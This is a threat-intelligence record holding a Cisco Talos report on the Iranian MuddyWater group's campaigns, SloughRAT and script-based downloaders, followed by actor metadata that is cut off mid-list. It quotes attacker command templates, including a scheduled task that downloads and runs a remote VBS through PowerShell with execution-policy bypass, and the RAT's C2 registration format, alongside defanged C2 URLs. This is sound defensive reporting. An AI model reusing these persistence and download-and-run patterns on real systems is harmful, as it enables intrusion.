{ "id": "f8c5295a-99d4-48e7-b2fd-56ca10312d08", "created_at": "2026-04-06T00:13:47.295547Z", "updated_at": "2026-04-10T03:34:22.677028Z", "deleted_at": null, "sha1_hash": "973a3d9c5b01a7d62278b4dcd5ad72efd7c36819", "title": "Iranian linked conglomerate MuddyWater comprised of regionally focused subgroups", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5872868, "plain_text": "Iranian linked conglomerate MuddyWater comprised of regionally\r\nfocused subgroups\r\nBy Asheer Malhotra\r\nPublished: 2022-03-10 · Archived: 2026-04-05 14:13:37 UTC\r\nCisco Talos has observed new cyber attacks targeting Turkey and other Asian countries we believe with\r\nhigh confidence are from groups operating under the MuddyWater umbrella of APT groups. U.S. Cyber\r\nCommand recently connected MuddyWater to Iran's Ministry of Intelligence and Security (MOIS).\r\nThese campaigns primarily utilize malicious documents (maldocs) to deploy downloaders and RATs\r\nimplemented in a variety of languages, such as PowerShell, Visual Basic and JavaScript.\r\nAnother new campaign targeting the Arabian peninsula deploys a WSF-based RAT we're calling\r\n\"SloughRAT\", identified as an implant called \"canopy\" by CISA in their advisory released in late February.\r\nBased on a review of multiple MuddyWater campaigns, we assess that the Iranian APT is a conglomerate\r\nof multiple teams operating independently rather than a single threat actor group.\r\nThe MuddyWater supergroup is highly motivated and can use unauthorized access to conduct espionage,\r\nintellectual property theft and deploy ransomware and destructive malware in an enterprise.\r\nExecutive summary\r\nCisco Talos has identified multiple campaigns and tools being perpetrated by the MuddyWater APT group, widely\r\nconsidered to be affiliated with Iranian interests. These threat actors are considered extremely motivated and\r\npersistent when it comes to targeting victims across the globe.\r\nTalos disclosed a MuddyWater campaign in January targeting Turkish entities that leveraged maldocs and\r\nexecutable-based infection chains to deliver multistage, PowerShell-based downloader malware. This group\r\npreviously used the same tactics to target other countries in Asia, such as Armenia and Pakistan.\r\nIn our latest findings, we discovered a new campaign targeting Turkey and the Arabian peninsula with maldocs to\r\ndeliver a Windows script file (WSF)-based remote access trojan (RAT) we're calling \"SloughRAT\" an implant\r\nknown by \"canopy\" in CISA's most recent alert from February 2022 about MuddyWater.\r\nThis trojan, although obfuscated, is relatively simple and attempts to execute arbitrary code and commands\r\nreceived from its command and control (C2) servers.\r\nOur investigation also led to the discovery of the use of two additional script-based implants: one written in Visual\r\nBasic (VB) (late 2021 - 2022) and one in JavaScript (2019 - 2020), which also downloads and runs arbitrary\r\ncommands on the victim's system.\r\nMuddyWater's variety of lures and payloads — along with the targeting of several different geographic regions —\r\nstrengthens our growing hypothesis that MuddyWater is a conglomerate of sub-groups rather than a single actor.\r\nThese sub-groups have conducted campaigns against a variety of industries such as national and local\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 1 of 20\n\ngovernments and ministries, universities and private entities such as telecommunication providers. While these\r\nteams seem to operate independently, they are all motivated by the same factors that align with Iranian national\r\nsecurity objectives, including espionage, intellectual theft, and destructive or disruptive operations based on the\r\nvictims they target.\r\nA variety of campaigns analyzed are marked by the development and use of distinct infection vectors and tools to\r\ngain entry, establish long-term access, siphon valuable information and monitor their targets. The MuddyWater\r\nteams appear to share TTPs, as evidenced by the incremental adoption of various techniques over time in different\r\nMuddyWater campaigns. We represent this progression in a detailed graphic in the first main section of this blog.\r\nMuddyWater threat actor\r\nMuddyWater, also known as \"MERCURY\" or \"Static Kitten,\" is an APT group the U.S. Cyber Command recently\r\nattributed to Iran's Ministry of Intelligence and Security (MOIS). This threat actor, active since at least 2017,\r\nfrequently conducts campaigns against high-value targets in countries in North America, Europe and Asia.\r\nMuddyWater campaigns typically fall into one of the following categories:\r\nEspionage: Collecting information on adversaries or regional partners that can benefit Iran by helping to\r\nadvance its political, economic, or national security interests.\r\nIntellectual property theft: Stealing intellectual property and other proprietary information can benefit\r\nIran in a variety of ways, including helping Iranian businesses against their competitors, influencing\r\neconomic policy decisions at the state level, or informing government-related research and design efforts,\r\namong others. These campaigns target private and government entities, such as universities, think tanks,\r\nfederal agencies, and various industry verticals.\r\nRansomware attacks: MuddyWater has previously attempted to deploy ransomware, such as Thanos, on\r\nvictim networks to either destroy evidence of their intrusions or disrupt operations.\r\nMuddyWater frequently relies on the use of DNS to contact their C2 servers, while the initial contact with hosting\r\nservers is done via HTTP. Their initial payloads usually use PowerShell, Visual Basic and JavaScript scripting\r\nalong with living-off-the-land binaries (LoLBins) and remote connection utilities to assist in the initial stages of\r\nthe infection.\r\nMuddyWater likely comprised of multiple sub-groups\r\nWe assess that MuddyWater is a conglomerate of smaller teams, with each team using different targeting tactics\r\nagainst specific regions of the world. They appear to share some techniques and evolve them as needed. This\r\nsharing is possibly the result of contractors that move from team to team, or the use of the same development and\r\noperational contractors across each team. The latter also explains why we have seen simple indicators such as\r\nunique strings and watermarks shared between MuddyWater and the Phosphorus (aka APT35 and Charming\r\nKitten) APT groups. These groups are attributed to different Iranian state organizations — the MOIS and IRGC,\r\nrespectively.\r\nBased on new information and a review of MuddyWater threat activity and TTPs, we can link together the attacks\r\ncovered in our January 2022 MuddyWater blog with this most recent campaign targeting Turkey and other Asian\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 2 of 20\n\ncountries. The graphic below shows the overlap in TTPs and regional targeting between the various MuddyWater\r\ncampaigns, which suggests  these attacks are distinct, yet related, clusters of activity. While some campaigns\r\ninitially appeared to leverage new TTPs that seemed unrelated to other operations, we later found that they instead\r\ndemonstrated a broader TTP-sharing paradigm, typical of coordinated operational teams.\r\nTracing MuddyWater's activity over the last year, we see that some of the shared techniques seem to be refined\r\nfrom one region to the other, suggesting the teams use their preferred flavors of tools of choice, including final\r\npayloads. The above timeline also shows the incremental usage of certain techniques in different campaigns over\r\ntime, suggesting that they are tested and improved before being implemented in future operations.\r\nThe first two techniques we see being implemented and then shared in future operations are signaling tokens and\r\nan executable dropper. We first observed the usage of tokens for signaling in April 2021 in a campaign against\r\nPakistan via a simple dropper that downloads the \"Connectwise\" remote administration tool. Later, in June, we see\r\nthe first usage of the executable dropper against Armenia (described in detail in our previous post). The dropped\r\npayload is a PowerShell script that loads another PowerShell script that downloads and executes a final\r\nPowerShell-based payload.\r\nThe two techniques were then combined later in August 2021 in a campaign targeting Pakistan, this time still\r\nusing the homemade tokens. Later, the actors graduated to a more professional implementation of the token by\r\nusing canarytokens[.]com 's infrastructure. canarytokens[.]com is a legitimate service that MuddyWater uses\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 3 of 20\n\nto make their operations appear less suspicious. These techniques were next leveraged in a November 2021\r\ncampaign targeting Turkey in the campaign we described in our January blog. In these attacks on Turkey,\r\nMuddyWater used maldocs with tokens and the same executable droppers previously seen targeting Armenia and\r\nPakistan.\r\nIn March 2021, we observed MuddyWater using the Ligolo reverse-tunneling tool in attacks on Middle Eastern\r\ncountries. This tactic was later reused in December 2021, along with the introduction of a new implant. Beginning\r\nin December 2021, we observed MuddyWater using a new WSF-based RAT we named \"SloughRAT\" to target\r\ncountries in the Arabian Peninsula, which is described in more detail later in this blog. During our investigation,\r\nwe discovered another version of SloughRAT being deployed against entities in Jordan. This attack included the\r\ndeployment of Ligolo — a MuddyWater tactic also corroborated by Trend Micro in March 2021 — following the\r\ndeployment of SloughRAT.\r\nAll these attacks show an interesting pattern: Multiple commonalities in some key infection artifacts and TTPs,\r\nwhile retaining enough operational distinctions. This pattern can be broken down into the following practices:\r\nThe introduction of a TTP in one geography, a delay of typically two or three months, then the reuse of that\r\nsame TTP in a completely different geography, alongside other proven TTPs borrowed from campaigns\r\nconducted in another geography.\r\nThe introduction of at least one new TTP completely novel to MuddyWater's tactics in almost every\r\ngeographically distinct campaign.\r\nThese observations strongly indicate that MuddyWater is a group of groups, each responsible for targeting a\r\nspecific geography. Each is also responsible for developing novel infection techniques while being allowed to\r\nborrow from a pool of TTPs tested in previously separate campaigns.\r\nCampaigns\r\nTying together previous MuddyWater campaigns\r\nIn our previous post, we disclosed two campaigns using the same types of Windows executables — one targeting\r\nTurkey in November 2021 and one from June 2021 targeting Armenia. Another campaign illustrated previously\r\nused similar executables, this time to target Pakistan. This campaign deployed a PowerShell-based downloader on\r\nthe endpoint to accept and execute additional PS1 commands from the C2 server.\r\nGoing further back, in April 2021, we observed another instance of Muddywater targeting entities in Pakistan, this\r\ntime with a maldoc-based infection vector. The lure document claimed to be part of a court case, as the image\r\nbelow shows.\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 4 of 20\n\nMalicious lure containing a blurred image of the state emblem of Pakistan and referring to a court case.\r\nIn this case, however, the attackers attempted to deploy the Connectwise Remote Access client on the target's\r\nendpoints, a tactic commonly used by MuddyWater to gain an initial foothold on targets' endpoints.\r\nIn the attacks deploying the RAT in April 2021 and the EXE-based infection vector from August 2021, the\r\nmaldocs and decoy documents reached out to a common server to download a common image file that links them.\r\nThese campaigns used a homemade implementation of signaling tokens. In this case, the maldocs have an external\r\nentity downloaded from an attacker-controller server. This entity consists in a simple image which has no\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 5 of 20\n\nmalicious content. The same base URL is employed in both campaigns:\r\nhxxp://172.245.81[.]135:10196/Geq5P3aFpaSrK3PZtErNgUsVCfqQ9kZ9/\r\nHowever, the maldoc appends the additional URL extension\r\n\" ef4f0d9af47d737076923cfccfe01ba7/layer.jpg \" while the decoy appends \" /Pan-op/gallery.jpg \".\r\nThis may be a way for the attackers to track their initial infection vector and determine which one is more\r\nsuccessful. It is highly likely that the attackers used this server as a token tracker to keep track of successful\r\ninfections in this campaign. This token-tracking system was then migrated to CanaryTokens in September 2021 in\r\nthe attacks targeting Turkey using the malicious Excel documents.\r\nMuddyWater Middle East campaign using maldocs — SloughRAT\r\nDuring a recent IR engagement, Talos observed multiple instances of malicious documents (maldocs) —\r\nspecifically XLS files — distributed by MuddyWater. These XLS files were observed targeting the Arabian\r\npeninsula through a recent phishing campaign.\r\nThe maldoc consists of a malicious macro that drops two WSF files on the endpoint. One of these scripts is the\r\ninstrumentor script meant to execute the next stage. This instrumentor script is placed in the current user's Startup\r\nfolder by the VBA macro to establish persistence across reboots.\r\nThe second script is a WSF-based RAT we call \"SloughRAT\" that can execute arbitrary commands on the infected\r\nendpoint. This RAT consists of obfuscated code from interweaved Visual Basic and JavaScript.\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 6 of 20\n\nExcel document that drops the Outlook.wsf file.\r\nWSF-based instrumentor script\r\nAt first glance, the instrumentor script looks complicated because of its obfuscation. However, at its core, the\r\nscript is solely meant to execute the next stage WSF RAT payload.\r\nAt runtime, the code deobfuscates two key components for the next stage:\r\nPath to the RAT script that's hard-coded but obfuscated.\r\nThe de-facto key in the RAT that triggers the malicious code to call.\r\nThis data is then used to make a call to the WSF-based RAT:\r\ncmd.exe /c \u003cpath_to_WSF_RAT\u003e \u003ckey\u003e\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 7 of 20\n\nDeobfuscation of persistence.\r\nSloughRAT analysis\r\nThe WSF implant has several capabilities. The script uses multilayer obfuscation to hide its true extensions. The\r\nscreenshots below are the result of the analysis and are deobfuscations for better comprehension.\r\nThe RAT script needs a function name as an argument to execute correctly and perform its malicious activities.\r\nThis name is provided by the instrumentor script and could be a method of thwarting automated dynamic analysis,\r\nsince submitting the RAT script in isolation without the function name as an argument will result in a failed run of\r\nthe sample in a sandbox.\r\nPreliminary information gathering and infection registration\r\nThe RAT script begins execution by performing a WMI query to record the IP address of the infected endpoint.\r\nDeobfuscation of discovery capabilities.\r\nIt will then get the user and computer names by querying the environment variables:\r\n%COMPUTERNAME%\r\n%USERNAME%\r\nDeobfuscation of discovery capabilities.\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 8 of 20\n\nThis system information is then concatenated using a delimiter and encoded to register the infected system with\r\nthe C2 server hardcoded into the implant.\r\nFormat:\r\n\u003cIP_address\u003e|!)!)!|%ComputerName%/%USERNAME%\r\nRAT capabilities\r\nThis RAT's capabilities are relatively simple, aside from the information-gathering capabilities described\r\npreviously.\r\nOnce the infection is registered with the C2 server, the implant will receive a command code from the C2 server.\r\nThe implant uses two different URLs:\r\nOne is used to register the implant and request arbitrary commands from the C2.\r\nAnother that is used to POST the results of the commands executed on the infected endpoint.\r\nThe communication with the C2 is done using the common ServerXMLHTTP from the MSXML2 API to\r\ninstrument an HTTP POST request.\r\nThe time between each request is randomized, which makes the malware stealthier and can bypass some\r\nsandboxes.\r\nDeobfuscation of HTTP request construction.\r\nAny data sent to the C2 server is in the format of HTTP forms accompanied by relevant headers, like:\r\nContent-Type\r\nContent-Length\r\nCharSet.\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 9 of 20\n\nFirst, the script sends the system information to the first C2 URL, by encoding the message, and sending it via\r\nPOST request, inside the parameter \"vl\" using the following format:\r\n\u003cIP_address\u003e|!)!)!|%ComputerName%/%USERNAME%\r\nThen, the server returns a UID constructed via concatenation of the server IP and an UUIDv4.\r\nFor example, the UID 5-199-133-149-\u003cUUIDv4\u003e\r\nis stored in a variable and sends keep-alive messages  to request commands from the C2.\r\nThen, this UID is sent through \" vl \" parameters inside a POST HTTP request to another C2 URL.\r\nWhen the server receives this UID, it returns an encoded message that the script interprets.\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 10 of 20\n\nThe message can be:\r\n\"ok\": Do nothing and send the UID again (like a keep-alive).\r\n\"401\": This order cleans the UID variable and forces the script to request another UID, by sending a\r\nrequest to the first URI.\r\nA command to execute that starts the command execution routine.\r\nA command received from the C2 server will be executed using the command line utility. Its output is recorded in\r\na temporary file on disk in a location such as \" %TEMP%\\stari.txt \". This data is then immediately read and sent\r\nout to the C2. The message will have the following format:\r\n\u003cUID\u003e|!)!)!|\u003cresult of command output\u003e\r\nCommands are executed using the command line:\r\ncmd.exe /c \u003ccommand_sent_by_C2\u003e \u003e\u003e \u003cpath_to_temp_file\u003e\r\nDeobfuscation of command execution routine.\r\nThe attackers used another version of SloughRAT, which isn't as obfuscated as the version illustrated earlier, this\r\ntime targeting entities in the Arabian peninsula. The overall functionality used in this instance is the same with\r\nminor modifications in file paths, delimiters, etc.\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 11 of 20\n\nVersion No. 2 of the WSF RAT — minor changes only.\r\nThe attackers utilized SloughRAT to deploy Ligolo, an open-source reverse-tunneling tool to gain a greater degree\r\nof control over the infected endpoints. This tactic observed is in sync with previous findings from Trend Micro.\r\nOverall infection chain:\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 12 of 20\n\nVBS-based downloaders\r\nIn another instance, we observed the deployment of VBS-based malicious downloaders in December 2021 and\r\nthrough January 2022 via malicious scheduled tasks set up by the attackers. The scheduled task would look\r\nsomething like this:\r\nSchTasks /Create /SC ONCE /ST 00:01 /TN \u003ctask_name\u003e /TR powershell -exec bypass -w 1 Invoke-WebRequest\r\n-Uri '\u003cremote_URL_location\u003e' -OutFile \u003cmalicious_VBS_path_on_endpoint\u003e;\r\nwscript.exe \u003cmalicious_VBS_path_on_endpoint\u003e\r\nThese tasks download and parse content from the C2 server and execute it on the infected endpoint. The output of\r\nthe command would be written to a temporary file in the %APPDATA% directory and subsequently read and\r\nexfiltrated to the C2.\r\nThe complete infection chain of these VBS-based downloaders is currently unknown.\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 13 of 20\n\nVBS-based downloader.\r\nOlder campaign using JS-based downloaders\r\nAn older campaign operated by MuddyWater toward the end of November 2019 and into 2020 utilized maldocs\r\nand a convoluted chain of obfuscated scripts to deploy a JavaScript-based downloader/stager on the infected\r\nendpoint. This campaign also appears to target Turkish users.\r\nThe maldoc contains a macro that would drop a malicious obfuscated VBS in a directory on the system. The\r\nmacros would then create persistence for the VBS via the Registry Run key of the current user. This VBS is\r\nresponsible for deobfuscating the next payloads and executing them on the endpoint. This execution culminated\r\ninto a malicious JS downloader being executed on the system to download and execute commands.\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 14 of 20\n\nJS-based downloader.\r\nConclusion\r\nCisco Talos has observed Iranian APT groups conducting malicious operations and activities all over the world for\r\nyears. Particularly, 2021 was prolific in cybersecurity incidents for Iran where state-run organizations were\r\ntargeted. These events were attributed to Western nations by the Iranian regime, with the promise of revenge. It's\r\nhard to say if these campaigns are the result of such promises or just part of these groups' usual activity. However,\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 15 of 20\n\nthe fact that they have changed some of their methods of operation and tools is yet another sign of their\r\nadaptability and unwillingness to refrain themselves from attacking other nations.\r\nWe believe there are links between these different campaigns, including the migration of techniques from region\r\nto region, along with their evolution into more advanced versions. Overall, the campaigns we describe cover\r\nTurkey, Pakistan, Armenia and countries from the Arabian peninsula. While they share certain techniques, these\r\ncampaigns also denote individuality in the way they were conducted, indicating the existence of multiple sub-teams beneath the Muddywater umbrella — all sharing a pool of tactics and tools to pick and choose from.\r\nIn-depth defense strategies based on a risk analysis approach can deliver the best results in protecting against such\r\na highly motivated set of threat actors. However, this should always be complemented by a good incident response\r\nplan which has not only been tested with table top exercises, but also reviewed and improved every time it is put\r\nto the test on real engagements.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 16 of 20\n\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 17 of 20\n\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nSnort rules for protection against this threat are: 59226 - 59230.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints\r\nare infected with this specific threat. For specific OSqueries on this threat, click below:\r\nLigolo\r\nSloughRat\r\nIOCS\r\nMaldocs\r\n4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c\r\n026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141\r\n7de663524b63b865e57ffc3eb4a339e150258583fdee6c2c2ca4dd7b5ed9dfe7\r\n6e50e65114131d6529e8a799ff660be0fc5e88ec882a116f5a60a2279883e9c4\r\nef385ed64f795e106d17c0a53dfb398f774a555a9e287714d327bf3987364c1b\r\nWSF\r\nd77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0\r\ned988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418\r\nc2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 18 of 20\n\nf10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0\r\ncc67e663f5f6cea8327e1323ecdb922ae8e48154bbf7bd3f9b2ee2374f61c5d6\r\nVBS\r\nfb69c821f14cb0d89d3df9eef2af2d87625f333535eb1552b0fcd1caba38281f\r\nJS\r\n202bf7a4317326b8d0b39f1fa19304c487128c8bd6e52893a6f06f9640e138e6\r\n3fe9f94c09ee450ab24470a7bcd3d6194d8a375b3383f768662c1d561dab878d\r\ncf9b1e0d17199f783ed2b863b0289e8f209600a37724a386b4482c2001146784\r\nEXEs\r\na500e5ab8ce265d1dc8af1c00ea54a75b57ede933f64cea794f87ef1daf287a1\r\nIPs\r\n185[.]118.164.195\r\n5[.]199[.]133[.]149\r\n88[.]119[.]170[.]124\r\n185[.]183[.]97[.]25\r\n95[.]181.161.81\r\n178[.]32[.]30[.]3\r\nURLs\r\nhxxp://185[.]118.164.195/c\r\nhxxp://5[.]199[.]133[.]149/oeajgyxyxclqmfqayv\r\nhxxp://5[.]199[.]133[.]149/jznkmustntblvmdvgcwbvqb\r\nhxxp://88[.]119.170.124/lcekcnkxkbllmwlpoklgof\r\nhxxp://88[.]119.170.124/ezedcjrfvjriftmldedu\r\nhxxp://178[.]32.30.3:80/kz10n2f9d5c4pkz10n2f9s2vhkz10n2f9/gcvvPu2KXdqEbDpJQ33/\r\nhxxp://178[.]32.30.3:80/kz10n2f9d5c4pkz10n2f9s2vhkz10n2f9/rrvvPu2KXdqEbDpJQ33/\r\nhxxp://185[.]183.97.25/protocol/function.php\r\nhxxp://lalindustries[.]com/wp-content/upgrade/editor.php\r\nhxxp://advanceorthocenter[.]com/wp-includes/editor.php\r\nhxxp://95[.]181.161.81/i100dfknzphd5k\r\nhxxp://95[.]181.161.81/mm57aayn230\r\nhxxp://95[.]181.161.81:443/main.exe\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 19 of 20\n\nSource: https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html" ], "report_names": [ "iranian-supergroup-muddywater.html" ], "threat_actors": [ { "id": "82b92285-4588-48c9-8578-bb39f903cf62", "created_at": "2022-10-25T15:50:23.850506Z", "updated_at": "2026-04-10T02:00:05.418577Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "Charming Kitten" ], "source_name": "MITRE:Charming Kitten", "tools": [ "DownPaper" ], "source_id": "MITRE", "reports": null }, { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7", "created_at": "2025-08-07T02:03:24.764883Z", "updated_at": "2026-04-10T02:00:03.611225Z", "deleted_at": null, "main_name": "COBALT MIRAGE", "aliases": [ "DEV-0270 ", "Nemesis Kitten ", "PHOSPHORUS ", "TunnelVision ", "UNC2448 " ], "source_name": "Secureworks:COBALT MIRAGE", "tools": [ "BitLocker", "Custom powershell scripts", "DiskCryptor", "Drokbk", "FRPC", "Fast Reverse Proxy (FRP)", "Impacket wmiexec", "Ngrok", "Plink", "PowerLessCLR", "TunnelFish" ], "source_id": "Secureworks", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", 